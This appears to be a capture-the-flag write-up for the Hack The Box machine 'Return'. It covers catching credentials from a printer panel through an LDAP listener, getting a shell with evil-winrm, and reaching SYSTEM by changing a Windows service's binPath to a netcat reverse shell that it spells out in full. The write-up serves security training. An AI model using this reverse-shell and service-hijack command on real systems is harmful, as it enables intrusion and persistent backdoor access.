☄️Return
https://app.hackthebox.com/machines/Return
We first see this nmap output:
On the webpage we can see a printer admin panel ->
With settings that seem to be vulnerable:
Inspect element did not work on the password field so i set up a listener on port 389, modify the hostname and hit update button ->
With a quick evil-winrm we can get a shell ->
and get a flag
Now the enumeration part is looking at the privileges of the account and what groups is he a part of ->
So i follow the methodology of the documentation and put netcat on the target machine ->
we replace the service binary with netcatthen it will give us a reverse shell as a system user because the service is starting as a system on the compromised host.
Then we will stop the service and start it again. So, this time when service starts, it will execute the binary that we have set in set earlier.
and obtain a shell as system
explanation of the SC command:
sc.exe
:This is the Service Control utility in Windows, used for communicating with the Service Control Manager and services.
config
:This argument specifies that you are changing the configuration of a service.
VMTools
:The name of the service you are configuring. In this case, "VMTools".
binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.58 1234"
:This parameter sets the executable path and arguments that the service will run.
C:\Users\svc-printer\Desktop\nc.exe
: Specifies the path to the executable, which isnc.exe
(Netcat).-e cmd.exe
: An option for Netcat to execute a specified program (cmd.exe
) after establishing a connection.10.10.14.58 1234
: The IP address and port to which Netcat will connect. In this example, it connects to10.10.14.58
on port1234
.
This command changes the executable path of the "VMTools" service to run
nc.exe
(Netcat) instead of its original executable.Remote Shell: The
nc.exe -e cmd.exe 10.10.14.58 1234
part tells Netcat to open a command shell (cmd.exe
) and send it to the specified IP address and port.Backdoor: This effectively turns the "VMTools" service into a backdoor, allowing an attacker to connect to the machine remotely and gain command line access.
Last updated